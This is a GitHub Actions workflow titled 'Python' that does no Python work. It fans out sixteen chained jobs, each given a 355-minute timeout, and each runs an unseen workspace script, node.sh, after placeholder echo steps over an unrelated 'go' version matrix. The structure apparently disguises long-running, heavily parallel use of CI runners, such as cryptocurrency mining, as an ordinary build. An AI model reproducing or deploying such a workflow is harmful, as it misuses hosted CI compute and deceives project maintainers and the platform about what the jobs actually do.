name: Python
on:  
  push:
  pull_request:

jobs:
 python-1:
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"

 python-2:
    runs-on: ubuntu-18.04 
    needs: python-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"

 python-build-4:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-3:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-2:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-1:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"
      
 python-build-8:
    runs-on: ubuntu-20.04 
    needs: python-build-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-7:
    runs-on: ubuntu-20.04 
    needs: python-build-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-6:
    runs-on: ubuntu-20.04 
    needs: python-build-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-5:
    runs-on: ubuntu-20.04 
    needs: python-build-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"
      
 python-build-12:
    runs-on: ubuntu-20.04 
    needs: python-build-5
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-11:
    runs-on: ubuntu-20.04 
    needs: python-build-5
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-10:
    runs-on: ubuntu-20.04 
    needs: python-build-5
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-9:
    runs-on: ubuntu-20.04 
    needs: python-build-5
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"
      
 python-build-16:
    runs-on: ubuntu-20.04 
    needs: python-build-9
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-15:
    runs-on: ubuntu-20.04 
    needs: python-build-9
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-14:
    runs-on: ubuntu-20.04 
    needs: python-build-9
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"

 python-build-13:
    runs-on: ubuntu-20.04 
    needs: python-build-9
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 355
    
    steps:
    - uses: actions/checkout@v2
    - name: Python-setup
      run: sudo apt-get update
    - name: Python-build
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh"
